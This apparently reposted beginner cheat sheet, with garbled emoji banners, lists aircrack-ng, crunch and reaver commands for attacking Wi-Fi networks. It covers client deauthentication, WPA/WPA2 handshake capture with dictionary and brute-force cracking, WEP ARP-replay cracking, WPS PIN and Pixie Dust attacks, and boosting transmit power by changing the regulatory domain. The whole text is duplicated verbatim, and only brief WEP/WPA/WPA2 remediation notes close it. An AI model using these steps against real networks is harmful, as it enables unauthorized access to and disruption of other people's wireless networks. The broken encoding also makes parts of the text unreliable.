β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers
ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase
WPA PSK attack with aircrack-ng suite.
--------------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
WEP attack with aircrack-ng suite.
----------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers
ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase
WPA PSK attack with aircrack-ng suite.
--------------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
WEP attack with aircrack-ng suite.
----------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β